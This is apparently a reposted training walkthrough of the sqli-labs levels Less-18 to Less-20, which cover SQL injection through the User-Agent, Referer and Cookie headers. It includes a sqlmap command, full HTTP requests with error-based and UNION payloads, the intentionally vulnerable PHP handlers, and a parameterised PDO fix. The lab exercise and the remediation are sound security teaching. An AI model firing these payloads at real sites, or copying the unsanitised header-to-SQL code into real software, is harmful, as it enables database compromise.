[MySQL SQL Injection] [Introductory] Using sqli-labs, Part 4 [Less-18 to Less-20]

Source: Internet
Uploader: User
In these levels the injection points mostly arise in HTTP header fields.

Common HTTP header injection points are 【Referer】, 【X-Forwarded-For】, 【Cookie】, 【X-Real-IP】, 【Accept-Language】 and 【Authorization】.

  • Less-18 Header Injection - Error Based - string

1) Tool usage:
The injection point is in the User-Agent header, so sqlmap's -r option is enough: save the test request as 1.txt, append a * to the User-Agent field to mark the injection point, then run the following command to let the tool do the injection.

    • sqlmap -r 1.txt --current-db --threads 10 --batch --technique BEST

Test request 1.txt

    POST /hacker/sqli-labs-master/Less-18/index.php HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0*
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://127.0.0.1/hacker/sqli-labs-master/Less-18/index.php
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 38

    uname=admin&passwd=admin&submit=Submit

2) Manual injection
The form fields are handled the same way as in the previous levels; as long as database errors are echoed back, balancing the single quote and sending an updatexml() error-based statement is enough to confirm the injection point.

    POST /hacker/sqli-labs-master/Less-18/index.php HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0' and updatexml(1,concat(0x7e,database()),1) and '11'='11
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://127.0.0.1/hacker/sqli-labs-master/Less-18/index.php
    Connection: close
    Cache-Control: max-age=0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 38

    uname=admin&passwd=admin&submit=Submit

3) Code that creates the injection point

    // Check whether the value is empty; if it is not, filter the input with mysql_real_escape_string()
    function check_input($value) {
        if (!empty($value)) {
            // truncation (see comments)
            $value = substr($value, 0, 20);
        }
        // Stripslashes if magic quotes enabled
        if (get_magic_quotes_gpc()) {
            $value = stripslashes($value);
        }
        // Quote if not a number
        if (!ctype_digit($value)) {
            $value = "'".mysql_real_escape_string($value)."'";
        } else {
            $value = intval($value);
        }
        return $value;
    }

    $uagent = $_SERVER['HTTP_USER_AGENT'];
    $IP = $_SERVER['REMOTE_ADDR'];
    echo "<br>";
    echo 'Your IP ADDRESS is: '.$IP;
    echo "<br>";
    //echo 'Your User Agent is: ' .$uagent;
    // take the variables
    if (isset($_POST['uname']) && isset($_POST['passwd'])) {
        $uname = check_input($_POST['uname']);
        $passwd = check_input($_POST['passwd']);
        //logging the connection parameters to a file for analysis.
        $fp = fopen('result.txt', 'a');
        fwrite($fp, 'User Agent:'.$uname."\n");
        fclose($fp);
        $sql = "SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
        $result1 = mysql_query($sql);
        $row1 = mysql_fetch_array($result1);
        if ($row1) {
            echo '<font color= "#FFFF00" font size = 3 >';
            // Injection point: $uagent is taken straight from the request header and never passes through check_input()
            $insert = "INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
            mysql_query($insert);
            // ... (remainder of the lab's handler not shown on the original page)
        }
    }

- Less-19 Header Injection - Referer - Error Based - string

In this level the injection point is in the Referer header: the value is written to the database with an INSERT statement without any check.

Payload (the injection statement used):

    Referer:' AND (SELECT 1690 FROM(SELECT COUNT(*),CONCAT(0x716a707171,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,54)),0x717a767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'qmQA'='qmQA

Complete HTTP request:

    POST /sqli-labs-master/Less-19/ HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://127.0.0.1/sqli-labs-master/Less-19/' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 38

    uname=admin&passwd=admin&submit=Submit

Core code

    function check_input($value) {
        if (!empty($value)) {
            // truncation (see comments)
            $value = substr($value, 0, 20);
        }
        // Stripslashes if magic quotes enabled
        if (get_magic_quotes_gpc()) {
            $value = stripslashes($value);
        }
        // Quote if not a number
        if (!ctype_digit($value)) {
            $value = "'".mysql_real_escape_string($value)."'";
        } else {
            $value = intval($value);
        }
        return $value;
    }

    $uagent = $_SERVER['HTTP_REFERER'];
    $IP = $_SERVER['REMOTE_ADDR'];
    echo "<br>";
    echo 'Your IP ADDRESS is: '.$IP;
    echo "<br>";
    //echo 'Your User Agent is: ' .$uagent;
    // take the variables
    if (isset($_POST['uname']) && isset($_POST['passwd'])) {
        $uname = check_input($_POST['uname']);
        $passwd = check_input($_POST['passwd']);
        $fp = fopen('result.txt', 'a');
        fwrite($fp, 'Referer:'.$uname."\n");
        fclose($fp);
        $sql = "SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
        $result1 = mysql_query($sql);
        $row1 = mysql_fetch_array($result1);
        if ($row1) {
            echo '<font color= "#FFFF00" font size = 3 >';
            // Injection point: the Referer value in $uagent is concatenated into the INSERT without check_input()
            $insert = "INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
            mysql_query($insert);
            // ... (remainder of the lab's handler not shown on the original page)
        }
    }

- Less-20 Cookie Injection - Error Based - string
Payload

    Cookie:Dumb-4829' UNION ALL SELECT NULL,CONCAT(0x7170786271,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x7176706271),NULL-- -

Core code

1) Receive the username and password;
2) If they are correct, set the username as the cookie value;
3) Query the database for a username equal to the cookie value.

Lines 144-147 of the lab code:

    $cookee = base64_decode($cookee);
    echo "<br></font>";
    $sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
    $result=mysql_query($sql);
    ...

Lines 188-189:

    echo " Your Cookie is deleted";
    setcookie('uname', base64_encode($row1['username']), time()-3600);
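All three levels share one defect: values read from $_SERVER and $_COOKIE never pass through check_input() and are concatenated straight into SQL, so escaping the form fields alone does nothing for them. The following is an added example (not the sqli-labs code) of the same handler with every external value bound as a PDO parameter; the DSN, DB_USER and DB_PASS are placeholders.

```php
<?php
// Added example: the Less-18/19/20 handler rewritten so that no external value
// (POST field, request header or cookie) is ever concatenated into SQL.
// DSN and credentials are placeholders, not values from the lab.
$pdo = new PDO('mysql:host=127.0.0.1;dbname=security;charset=utf8mb4', 'DB_USER', 'DB_PASS', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // server-side prepares: no client-side quoting at all
]);

// Length guard only; it replaces the lab's substr() and is not an injection defence.
function clip(string $value, int $max): string { return mb_substr($value, 0, $max); }

// Headers are attacker-controlled exactly like POST fields; the lab read them raw into the INSERT.
$uagent  = clip($_SERVER['HTTP_USER_AGENT'] ?? '', 255);
$referer = clip($_SERVER['HTTP_REFERER'] ?? '', 255);
$ip      = $_SERVER['REMOTE_ADDR'] ?? '';

if (isset($_POST['uname'], $_POST['passwd'])) {
    $uname  = clip($_POST['uname'], 20);
    $passwd = clip($_POST['passwd'], 20);

    // Login query from Less-18/19 with both operands bound. The plaintext comparison is kept only
    // to mirror the lab; a real application stores a hash and checks it with password_verify().
    $stmt = $pdo->prepare(
        'SELECT username, password FROM users WHERE username = ? AND password = ? ORDER BY id DESC LIMIT 1'
    );
    $stmt->execute([$uname, $passwd]);
    $row1 = $stmt->fetch(PDO::FETCH_ASSOC);

    if ($row1) {
        // The INSERTs that were the injection points in Less-18 and Less-19, now parameterised.
        $pdo->prepare('INSERT INTO uagents (uagent, ip_address, username) VALUES (?, ?, ?)')
            ->execute([$uagent, $ip, $row1['username']]);
        $pdo->prepare('INSERT INTO referers (referer, ip_address) VALUES (?, ?)')
            ->execute([$referer, $ip]);

        // Less-20 style cookie; HttpOnly so page scripts cannot read it.
        setcookie('uname', base64_encode($row1['username']), time() + 3600, '/', '', false, true);
    }
} elseif (isset($_COOKIE['uname'])) {
    // Less-20 lookup: strict base64 decoding rejects malformed input, and the decoded value is bound, not spliced.
    $cookee = base64_decode($_COOKIE['uname'], true);
    if ($cookee !== false) {
        $stmt = $pdo->prepare('SELECT * FROM users WHERE username = ? LIMIT 1');
        $stmt->execute([clip($cookee, 20)]);
        $row1 = $stmt->fetch(PDO::FETCH_ASSOC);
    }
}
```

With the values bound, the updatexml() and UNION payloads shown above are stored or compared as literal strings, which is also what makes them easy to spot later in the uagents and referers tables.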

  
